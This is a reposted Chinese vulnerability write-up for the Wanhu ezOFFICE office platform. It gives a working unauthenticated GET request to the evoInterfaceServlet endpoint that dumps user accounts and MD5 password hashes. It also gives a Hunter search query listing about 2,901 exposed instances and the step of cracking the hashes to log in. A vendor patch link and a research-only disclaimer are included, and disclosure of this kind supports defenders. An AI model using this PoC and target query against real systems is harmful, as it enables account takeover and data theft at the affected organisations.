万户协同办公平台未授权访问漏洞POC

admin 2024年9月28日12:29:31评论35 views字数 483阅读1分36秒阅读模式

 

0x02 漏洞描述

(一) 万户协同办公平台

万户ezOFFICE协同管理平台涵盖门户自定义平台、信息知识平台管理、系统管理平台功能,它以工作流引擎为底层服务,以通讯沟通平台为交流手段,以门户自定义平台为信息推送显示平台,为用户提供集成的协同工作环境。该平台存在未授权访问漏洞,攻击者可以从evoInterfaceServlet接口获得系统登录账号和用MD5加密的密码。

万户协同办公平台未授权访问漏洞POC

影响范围

version <=12.4.12.25

hunter语法:

app.name="万户 Ezoffice OA"
  hunter共2,901条资产

万户协同办公平台未授权访问漏洞POC

(二) 漏洞poc
GET /defaultroot/evoInterfaceServlet?paramType=user HTTP/1.1Host:

万户协同办公平台未授权访问漏洞POC

获取到登陆密码的MD5值去解密从而登陆系统

万户协同办公平台未授权访问漏洞POC

 

万户协同办公平台未授权访问漏洞POC

0x03 修复方案

官方修复缓解措施

补丁链接

http://www.whir.net/CustomerService/index.html

该漏洞仅影响较低版本,目前厂家已修复,可前往官网升级

原文始发于微信公众号(天擎攻防实验室):【漏洞复现】万户协同办公平台未授权访问漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年9月28日12:29:31
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   万户协同办公平台未授权访问漏洞POChttps://cn-sec.com/archives/1986838.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息